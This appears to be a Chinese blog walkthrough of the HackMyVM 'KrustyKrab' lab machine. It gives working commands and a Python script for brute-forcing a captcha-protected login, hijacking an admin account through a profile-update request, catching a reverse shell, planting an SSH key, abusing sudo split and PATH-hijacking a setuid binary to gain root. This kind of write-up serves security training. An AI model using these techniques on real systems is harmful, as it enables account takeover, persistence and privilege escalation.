Pepster'Blog
HackMyVM-KrustyKrab-Walkthrough
城南花已开 Lv6
  2025-04-01 08:26:21   2025-04-10 15:36:21    2.5k 字  13 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.129  08:00:27:49:f7:6d       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f0:6f:4b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.070 seconds (123.67 hosts/sec). 4 responded
~/temp
export ip=192.168.60.129
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
To scan or not to scan? That is the question.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.129:22
Open 192.168.60.129:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 08:27 CST
Initiating ARP Ping Scan at 08:27
Scanning 192.168.60.129 [1 port]
Completed ARP Ping Scan at 08:27, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:27
Completed Parallel DNS resolution of 1 host. at 08:27, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:27
Scanning 192.168.60.129 [2 ports]
Discovered open port 80/tcp on 192.168.60.129
Discovered open port 22/tcp on 192.168.60.129
Completed SYN Stealth Scan at 08:27, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.129
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-04-01 08:27:53 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:49:F7:6D (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

curl一下网页,得到网页源码中含有注释

1
2
3
4
5
❯ curl $ip

…………省略
          </p>
                <!--/var/www/html/finexo -->

表单爆破

有一个新的目录为finexo

尝试访问一下里面有一个登录表单login.php

image

经过枚举,得知存在用户SpongeBob

否则其他用户则会提示用户不存在,只有此用户会有回显密码错误

并且在particles.min.js文件内容的末尾存在JSFuck编码

image

尝试解码下,得到验证码生成的源码逻辑

1
2
3
4
5
function generateCaptcha() { $characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
$code = ""; 
$seed = time(); 
mt_srand($seed); 
for ($i = 0; $i < 4; $i++) { $code .= $characters[mt_rand(0, strlen($characters) - 1)]; } $_SESSION['captcha'] = strtolower($code); return $code; }

发现Captcha的生成是依靠Unix时间戳的,每次访问的验证码都不同,如果预测服务器的时间就可以复现相同的验证码,所以此随机数是可以预测的

但你会发现访问login.php的同时会同时访问并传参?action=generateCaptcha

则会直接显示验证码图片中的字母

那直接爆破中加上此验证码不就完了

贴一个作者的脚本,我稍微修改了一下,处理字符集编码的问题

并且将验证码转为全部小写,因为我使用的是作者的初版靶机,可能忘了修改

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
 
captcha_url = 'http://192.168.60.129/finexo/login.php?action=generateCaptcha'
login_url = 'http://192.168.60.129/finexo/login.php'
 
# 创建会话对象
session = requests.Session()
 
cnt =0
with open('/usr/share/wordlists/rockyou.txt','r', encoding="utf-8", errors="ignore") as f:
    for password in f.readlines():
 
        # 获取验证码
        captcha = session.get(captcha_url).text.strip().lower()
 
        password = password.strip()  # 去除密码两端的空白字符
 
        data={
            'username':'spongebob',
            'password':f'{password}',
            'captcha': captcha
        }
 
        # 使用会话对象发送POST请求进行登录
        try_login = session.post(login_url, data=data)
        cnt +=1
        # 输出登录结果
        print(f"Attempting with password: {password} {cnt}")
 
 
        # 检查是否登录成功,假设返回的文本包含某个成功标志
        if "successful" in try_login.text:
            print(f"Login successful with password: {password}")
            break

执行一下脚本,得到密码squarepants

1
2
3
❯ python3 brute.py

Login successful with password: squarepants

用户越权

尝试登录一下

image

发现在页面中很多元素都是锚点连接

在mail中存在其他用户的信息

image

还有个编辑个人资料可以点击

image

发现可以尝试修改此用户的密码

尝试监听发包请求,得到会向update_profile.php发送POST包,其中含有用户名密码等信息

尝试修改用户名为Administratro,重新发包

我利用devtools方便一点

image

利用此用户登录,发现额外存在命令执行的功能

image

用户提权

监听端口

www-data用户拥有sudo权限

1
2
3
4
5
6
7
8
9
10
11
❯ pwncat-cs -lp 4444
[09:26:48] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[09:26:50] received connection from 192.168.60.129:41212                                                                                    bind.py:84
[09:26:50] 192.168.60.129:41212: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@KrustyKrab:/var/www/html/finexo/admin_dashborad$ sudo -l
Matching Defaults entries for www-data on KrustyKrab:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User www-data may run the following commands on KrustyKrab:
    (KrustyKrab) NOPASSWD: /usr/bin/split

正常利用split提权到KrustyKrab用户

正常就是没有回显的,在此shell下比较难受

1
2
3
4
5
(remote) www-data@KrustyKrab:/var/www/html/finexo/admin_dashborad$ sudo -u KrustyKrab /usr/bin/split --filter=/bin/sh /dev/stdin

id
uid=1000(KrustyKrab) gid=1000(debian) groups=1000(debian),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth),1002(krustygroup)

写一个私钥到用户家目录下

1
2
3
mkdir -p ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCmhumzHA2kpAF9W/XS9FK1CjvRlb1iP5kC8RhE/oyVaePE+eZudjlyvGyuJb1GDTad9Zi0hIW14bqdvfgU7HIYJKV1Y/goqs6BddT7KkYEs5643MxxErViGZP52hF3zggAi7Ho/BlnjRMPev1c1ZGzPbR+dpxd3mB6LUkiSEGwbXNOdmmleqmcZAkVEh7vi90/m1S9btqQpbbVRICGBQY6IHyl/PY6jX/W/38u/hhzj0u4poqqubOIWF2RA231osvqrG151Yeg3RYMJW89pK8D6f+Ma1h7sLE3VLlYe5kA2O0aKz0dgLK5KOshI08XhzpwBLKkpYlMRJ4U0KqJ04jhaF1P7o4Wa+hViAdKxOTBL5Y8RoFEGKVmhT9/pAel7BAmuBU0keGS3JaA5OltDBfbSHPPskdrUg/gWhbsjtt7Z+tTzTOSgl1gpQzHnTnfaMosF3WkwQrYq2sjcNEEmtRCF4Gyn92vD1MWfhepC0lGW3Z3o7AGt38ZuiH6/cR9LsjjIDqG90C2yxH4yNEbgW9/0qf6iD+ghDz9mBtzk0dJHMU6/GoxXTY1e+/bAlqDCF2NR+fogTm7DeGNJ9CuaxXF+laYa1wSeIKdMbdi+fmfwqVbiDxxmqbtqJVGmsbmoB1UYP+XZ74LcOPbsPoNzWo53P87a3U2620bIQx32yFPXw== Pepster@primary">~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

ssh连接一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
❯ ssh KrustyKrab@$ip -i ../.ssh/id_rsa
The authenticity of host '192.168.60.129 (192.168.60.129)' can't be established.
ED25519 key fingerprint is SHA256:0d4MWSfQ+tUZ0f4j8Wea2uYelBzzcaj0CI4NtYQIx0E.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.129' (ED25519) to the list of known hosts.
Linux KrustyKrab 6.1.0-9-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.27-1 (2023-05-08) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Mar 27 08:25:58 2025 from 192.168.56.118
KrustyKrab@KrustyKrab:~$ cat user.txt
dcc8b0c111c9fa1522c7abfac8d1864b

同时家目录中还存在help提示

1
2
KrustyKrab@KrustyKrab:~$ file help
help: GIF image data, version 89a, 480 x 270

scp传到本地,尝试打开一下

1
2
3
❯ scp -i ../.ssh/id_rsa KrustyKrab@$ip:~/help .
help                                     100% 2857KB  26.3MB/s   00:00
mv help help.gif

image

同时用户存在sudo权限,尝试分析一下ttteeesssttt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
KrustyKrab@KrustyKrab:~$ sudo -l
Matching Defaults entries for KrustyKrab on KrustyKrab:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User KrustyKrab may run the following commands on KrustyKrab:
    (spongeBob) NOPASSWD: /usr/bin/ttteeesssttt
KrustyKrab@KrustyKrab:~$ ls -al /usr/bin/ttteeesssttt
-rwxr-xr-x 1 root root 16560 Mar 27 08:07 /usr/bin/ttteeesssttt
KrustyKrab@KrustyKrab:~$ strings /usr/bin/ttteeesssttt
/lib64/ld-linux-x86-64.so.2
puts
system
time
strlen
getchar
__libc_start_main
srand
__cxa_finalize
printf
__isoc99_scanf
libc.so.6
GLIBC_2.7
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
<J~
Bottom bun
Patty
Lettuce
Cheese
Onion
Tomato
Ketchup
Mustard
Pickles
Top bun
ABCDEFGHIJ
Spongebob forgot how to make Krabby Patty, You need to help him!
Current shuffled recipe order:
%c: %s
Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J):
%10s
Error: You must enter exactly 10 letters!
Error: Contains invalid characters! Use only A-J.
Validation successful! Perfect Krabby Patty!
Validation failed! This is not the correct recipe!
/bin/bash -p
;*3$"
GCC: (Debian 12.2.0-14) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
puts@GLIBC_2.2.5
labels
shuffle
_edata
_fini
strlen@GLIBC_2.2.5
system@GLIBC_2.2.5
printf@GLIBC_2.2.5
srand@GLIBC_2.2.5
__data_start
getchar@GLIBC_2.2.5
__gmon_start__
__dso_handle
ingredients
_IO_stdin_used
time@GLIBC_2.2.5
_end
__bss_start
main
__isoc99_scanf@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

执行一下程序,我们就按照gif中的食材顺序进行填写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt

Spongebob forgot how to make Krabby Patty, You need to help him!

Current shuffled recipe order:
A: Lettuce
B: Onion
C: Pickles
D: Ketchup
E: Mustard
F: Patty
G: Cheese
H: Tomato
I: Top bun
J: Bottom bun
A: 生菜
B: 洋葱
C: 酸黄瓜
D: 番茄酱
E: 芥末酱
F: 牛肉饼
G: 奶酪
H: 西红柿
I: 上层汉堡包子面包片 
J. 下层汉堡包底部面包片
Please enter the correct order using letters (e.g., ABCDEFGHIJ):
Enter 10 letters (A-J): JFAGBHDECI

Validation successful! Perfect Krabby Patty!
spongebob@KrustyKrab:/home/KrustyKrab$

提权到spongebob用户下,有个新的提示

提示Squidward章鱼哥在等你

秘密就是key1和key2的md5值

key2就是md5(key2.jpeg)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
spongebob@KrustyKrab:~$ ls -al
total 56
drwx------ 2 spongebob spongebob  4096 Mar 27 05:16 .
drwxr-xr-x 6 root      root       4096 Mar 27 02:30 ..
-rw------- 1 spongebob spongebob    58 Mar 27 08:23 .bash_history
-rw-r--r-- 1 spongebob spongebob   220 Mar 26 20:14 .bash_logout
-rw-r--r-- 1 spongebob spongebob  3526 Mar 26 20:14 .bashrc
-rw-r--r-- 1 root      root         33 Mar 27 02:37 key1
-rw-r--r-- 1 root      root      19259 Mar 27 02:32 key2.jpeg
-rw------- 1 spongebob spongebob   113 Mar 27 05:16 .mysql_history
-rw-r--r-- 1 root      root         97 Mar 27 02:41 note.txt
-rw-r--r-- 1 spongebob spongebob   807 Mar 26 20:14 .profile
spongebob@KrustyKrab:~$ cat note.txt

Squidward is waiting for you!!!!

password is md5($key1$key2).

It's not so hard as you think.

spongebob@KrustyKrab:~$ cat key1
e1964798cfe86e914af895f8d0291812
spongebob@KrustyKrab:~$ md5sum key2.jpeg
5e1d0c1a168dc2d70004c2b00ba314ae  key2.jpeg
spongebob@KrustyKrab:~$ echo -n "e1964798cfe86e914af895f8d02918125e1d0c1a168dc2d70004c2b00ba314ae" |md5sum
7ac254848d6e4556b73398dde2e4ef82  -

Root提权

尝试切换一下用户

1
2
3
4
5
spongebob@KrustyKrab:~$ su Squidward
Password:
$ bash
Squidward@KrustyKrab:/home/spongebob$

在家目录中存在一个suid权限的文件

尝试分析一下,发现就是执行cat /etc/shadow命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
Squidward@KrustyKrab:~$ ls -la
total 40
drwx------ 3 Squidward Squidward  4096 Mar 27 08:20 .
drwxr-xr-x 6 root      root       4096 Mar 27 02:30 ..
-rw------- 1 Squidward Squidward     0 Mar 27 08:23 .bash_history
-rw-r--r-- 1 Squidward Squidward   220 Apr 23  2023 .bash_logout
-rw-r--r-- 1 Squidward Squidward  3526 Apr 23  2023 .bashrc
-rwsr-xr-x 1 root      root      16056 Mar 27 05:12 laststep
drwxr-xr-x 3 Squidward Squidward  4096 Mar 27 08:17 .local
-rw-r--r-- 1 Squidward Squidward   807 Apr 23  2023 .profile
Squidward@KrustyKrab:~$ file laststep
laststep: setuid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b84dc5079c77a9f2f2d82492f95a9c110ec51c87, for GNU/Linux 3.2.0, not stripped
Squidward@KrustyKrab:~$ strings laststep
/lib64/ld-linux-x86-64.so.2
setgid
setuid
system
__libc_start_main
__cxa_finalize
libc.so.6
GLIBC_2.2.5
GLIBC_2.34
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
PTE1
u+UH
cat /etc/shadow
;*3$"
GCC: (Debian 12.2.0-14) 12.2.0
Scrt1.o
__abi_tag
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.0
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
_DYNAMIC
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_start_main@GLIBC_2.34
_ITM_deregisterTMCloneTable
_edata
_fini
system@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
_end
__bss_start
main
setgid@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@GLIBC_2.2.5
__cxa_finalize@GLIBC_2.2.5
_init
.symtab
.strtab
.shstrtab
.interp
.note.gnu.property
.note.gnu.build-id
.note.ABI-tag
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.got.plt
.data
.bss
.comment

而且没有使用绝对路径,因此可以进行路径劫持

1
2
3
4
5
6
7
8
9
10
11
12
Squidward@KrustyKrab:~$ echo bash > cat
Squidward@KrustyKrab:~$ chmod +x cat
Squidward@KrustyKrab:~$ PATH=.:$PATH
Squidward@KrustyKrab:~$ echo $PATH
.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Squidward@KrustyKrab:~$ ./
cat       laststep  .local/
Squidward@KrustyKrab:~$ ./laststep
root@KrustyKrab:~# whoami
root
root@KrustyKrab:~# cat /root/root.txt

  1. 信息收集
    1. 服务探测
    2. 表单爆破
    3. 用户越权
  2. 用户提权
  3. Root提权
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
总字数 485.2k
  1. 信息收集
    1. 服务探测
    2. 表单爆破
    3. 用户越权
  2. 用户提权
  3. Root提权